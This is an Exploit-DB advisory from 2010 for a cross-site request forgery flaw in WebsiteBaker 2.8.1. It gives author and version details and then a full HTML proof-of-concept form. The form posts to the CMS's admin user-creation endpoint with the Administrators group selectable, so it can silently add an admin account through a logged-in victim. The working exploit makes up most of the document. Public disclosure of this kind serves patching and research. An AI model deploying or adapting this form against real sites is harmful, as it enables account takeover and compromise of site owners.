WebsiteBaker 2.8.1 - Cross-Site Request Forgery

EDB-ID:

13938

CVE:

N/A




Platform:

PHP

Date:

2010-06-19


# Author: Luis Santana
# Software Link: http://www.websitebaker2.org/modules/download_gallery/dlc.php?file=88&id=1269641667
# Version: 2.8.1
# Tested on: All
# Code : http://hacktalk.net/exploits/websitebakercsrfPOC.zip

The full advisory can be found at
http://hacktalk.net/exploits/websitebakerCSRF.txt

Regards,
Luis Santana
Admin - http://hacktalk.net
HackTalk Security

<h1>WebsiteBaker 2.8.1 CSRF Proof of Concept By Luis Santana HackTalk Security</h1>
<form name="user"action="http://demo.opensourcecms.com/websitebaker/admin/users/add.php" method="post" class="">
<input type="hidden" name="user_id" value="" />
<input type="hidden" name="username_fieldname" value="username_08y7h65u" />

<table cellpadding="5" cellspacing="0" border="0" width="100%">
<tr>
<td width="150">Username:</td>
<td class="value_input">
<input type="text" name="username_08y7h65u" maxlength="30" value="" />
</td>
</tr>
<tr>
<td>Password:</td>

<td class="value_input">
<input type="password" name="password" maxlength="30" />
</td>
</tr>
<tr>
<td>Re-type Password:</td>
<td class="value_input">
<input type="password" name="password2" maxlength="30" />
</td>

</tr>
<tr style="display:none;">
<td> </td>
<td style="font-size: 10px;">
Please note: You should only enter values in the above fields if you wish to change this users password
</td>
</tr>
<tr>
<td>Display Name:</td>
<td class="value_input">
<input type="text" name="display_name" maxlength="255" value="" />

</td>
</tr>
<tr>
<td>Email:</td>
<td class="value_input">
<input type="text" name="email" maxlength="255" value="" />
</td>
</tr>
<tr style="">
<td>Home Folder:</td>

<td class="value_input">
<select name="home_folder">
<option value="">None</option>

<option value="/testbild" >/media/testbild</option>
</select>
</td>
</tr>
<tr>

<td>Group:</td>
<td class="value_input">
<select name="groups[]" multiple="multiple" size="5">

<option value="1" >Administrators</option>
</select>
</td>
</tr>
<tr>

<td> </td>
<td>
<input type="radio" name="active[]" id="active" value="1" checked="checked" />
<label for="active">Active</label>
<input type="radio" name="active[]" id="disabled" value="0" />
<label for="disabled">Disabled</label>
</td>
</tr>

<tr>
<td> </td>
<td>
<input type="submit" name="submit" value="Add" />
<input type="reset" name="reset" value="Reset" />
</td>
</tr>
</table>

</form>


<p>Greetz to Shardy, Xires and Stacy, Rage, and n3xus</p>